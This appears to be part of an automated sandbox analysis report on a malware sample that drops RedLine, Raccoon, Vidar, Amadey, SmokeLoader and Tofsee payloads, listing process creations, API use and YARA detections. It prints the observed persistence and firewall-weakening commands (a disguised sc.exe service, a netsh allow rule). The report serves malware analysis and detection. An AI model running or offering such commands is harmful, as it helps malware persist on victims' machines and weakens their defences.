                          Source: 3F71.exe.2.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 3F71.exe.2.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 13.2.3F71.exe.130000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 13.2.3F71.exe.130000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 13.0.3F71.exe.130000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 13.0.3F71.exe.130000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 13.0.3F71.exe.130000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 13.0.3F71.exe.130000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 13.0.3F71.exe.130000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 13.0.3F71.exe.130000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 28.0.3F71.exe.fa0000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 28.0.3F71.exe.fa0000.11.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 28.0.3F71.exe.400000.12.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 28.0.3F71.exe.400000.8.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeProcess created: C:\Users\user\Desktop\zmbGUZTICp.exe "C:\Users\user\Desktop\zmbGUZTICp.exe"
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjProcess created: C:\Users\user\AppData\Roaming\gdrgbdj C:\Users\user\AppData\Roaming\gdrgbdj
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5200 -ip 5200
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 520
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\tejjnepq.exe" C:\Windows\SysWOW64\ozuqupbe\
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description ozuqupbe "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start ozuqupbe
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess created: C:\Users\user\AppData\Local\Temp\3F71.exe C:\Users\user\AppData\Local\Temp\3F71.exe
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                          Source: explorer.exe, 00000002.00000000.400523398.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.368411811.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.363539607.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.362510441.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.391475166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.374968369.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.385228035.00000000083E0000.00000004.00000001.sdmp, 1E7F.exe, 00000007.00000000.462252415.0000000000C70000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.455022743.0000000000C70000.00000002.00020000.sdmp, A7F0.exe, 0000001F.00000002.660457398.00000000036D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                          Source: explorer.exe, 00000002.00000000.374656651.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.362510441.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.391188066.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.362259036.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.391475166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.374968369.0000000000EE0000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.462252415.0000000000C70000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.455022743.0000000000C70000.00000002.00020000.sdmp, A7F0.exe, 0000001F.00000002.660457398.00000000036D0000.00000002.00020000.sdmpBinary or memory string: Progman
                          Source: explorer.exe, 00000002.00000000.362510441.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.391475166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.374968369.0000000000EE0000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.462252415.0000000000C70000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.455022743.0000000000C70000.00000002.00020000.sdmp, A7F0.exe, 0000001F.00000002.660457398.00000000036D0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
                          Source: explorer.exe, 00000002.00000000.362510441.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.391475166.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.374968369.0000000000EE0000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.462252415.0000000000C70000.00000002.00020000.sdmp, 1E7F.exe, 00000007.00000000.455022743.0000000000C70000.00000002.00020000.sdmp, A7F0.exe, 0000001F.00000002.660457398.00000000036D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: GetLocaleInfoA,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3F71.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Users\user\AppData\Local\Temp\3F71.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00419C99 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,TerminateJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,GetNamedPipeInfo,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexW,GetLastError,HeapFree,WriteConsoleOutputCharacterA,GetModuleHandleW,GetNumberOfConsoleInputEvents,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBA,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,WriteFile,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00419C99 __vswprintf,_putc,__wrename,_atexit,_malloc,_realloc,_ferror,GetBinaryTypeA,SetCurrentDirectoryA,Process32NextW,InitializeCriticalSection,QueryDosDeviceW,TerminateJobObject,GlobalAddAtomW,DeleteAtom,WriteProfileStringA,GetFullPathNameA,FindNextVolumeMountPointW,GetCompressedFileSizeA,GetNamedPipeInfo,lstrcpynA,GetProcessVersion,GetConsoleAliasesLengthW,UnregisterWait,GetProcessHandleCount,CancelWaitableTimer,SetFileApisToANSI,CreateIoCompletionPort,FindClose,SetEndOfFile,GetCommMask,LocalLock,OpenMutexW,GetLastError,HeapFree,WriteConsoleOutputCharacterA,GetModuleHandleW,GetNumberOfConsoleInputEvents,FreeEnvironmentStringsA,GetWriteWatch,GetConsoleAliasExesLengthW,_lopen,FileTimeToLocalFileTime,SetCommState,EnumDateFormatsA,TransactNamedPipe,WriteConsoleInputW,GetConsoleAliasExesLengthA,GetAtomNameW,FreeConsole,FlushConsoleInputBuffer,GetConsoleAliasA,SetConsoleCP,VerSetConditionMask,LockFile,SetSystemTime,SetThreadExecutionState,VerLanguageNameW,lstrcpyA,SetFileShortNameW,GetOverlappedResult,GetPrivateProfileSectionW,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,EnumTimeFormatsW,FindResourceExW,GetPrivateProfileSectionNamesW,GetOverlappedResult,WaitNamedPipeA,TransmitCommChar,CreateSemaphoreW,GetBinaryTypeW,PeekConsoleInputW,BuildCommDCBA,UnregisterWaitEx,GlobalLock,GetOverlappedResult,GetProcAddress,MoveFileExW,GetThreadContext,ResetEvent,FindActCtxSectionStringA,_memset,SetDefaultCommConfigW,lstrcmpW,HeapUnlock,GetConsoleMode,GetVolumePathNameA,MoveFileW,Process32NextW,GetFileAttributesExA,GetDriveTypeA,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionA,GetPrivateProfileSectionW,GetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceW,FindVolumeMountPointClose,DefineDosDeviceW,InterlockedExchange,SetMailslotInfo,GetTapeParameters,CreateActCtxW,FindCloseChangeNotification,GlobalFindAtomA,TerminateProcess,GetSystemWindowsDirectoryW,GetVersion,SetConsoleMode,WriteFile,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,DeleteVolumeMountPointA,

                          Lowering of HIPS / PFW / Operating System Security Settings:

                          barindex
                          Uses netsh to modify the Windows network and firewall settingsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Modifies the windows firewallShow sources
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

                          Stealing of Sensitive Information:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 13.2.3F71.exe.370f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.3F71.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.3F71.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.3F71.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.3F71.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.2.3F71.exe.370f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.3F71.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000022.00000002.583256444.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000002.636412165.0000000000402000.00000020.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000003.582614206.0000000003702000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000002.652977998.0000000007300000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000000.502914721.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.595825107.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000000.504088961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000000.503538300.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000003.594002288.0000000003702000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.639820143.0000000000252000.00000020.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.509652789.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.662009828.00000000066B0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000000.504557008.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.661388707.0000000003292000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected Amadeys stealer DLLShow sources
                          Source: Yara matchFile source: 0000002A.00000002.588041064.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.625237521.0000000000780000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000002.586424307.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.640023554.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000002.562794331.0000000000650000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000002.622790780.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.641856081.0000000000580000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000003.543825736.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000020.00000002.562158889.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002A.00000003.581841511.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000030.00000003.606394645.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000003.561673879.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.gdrgbdj.6515a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.1.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.2.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.zmbGUZTICp.exe.6415a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.408517834.00000000005C1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.408471084.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.462828818.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.392111314.0000000004151000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.462437704.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000024.00000002.645388633.0000000000712000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 31.2.A7F0.exe.4d60e50.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.3.A7F0.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.4d60e50.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.3.A7F0.exe.4e00000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001F.00000002.640601105.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000002.662718681.0000000004D60000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000003.553585077.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: A7F0.exe PID: 2200, type: MEMORYSTR
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 2DB3.exe PID: 5640, type: MEMORYSTR
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 11.3.309C.exe.660000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.3.tejjnepq.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 27.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.ed0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 27.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.ed0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000018.00000003.484958252.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.487069234.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.639945191.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
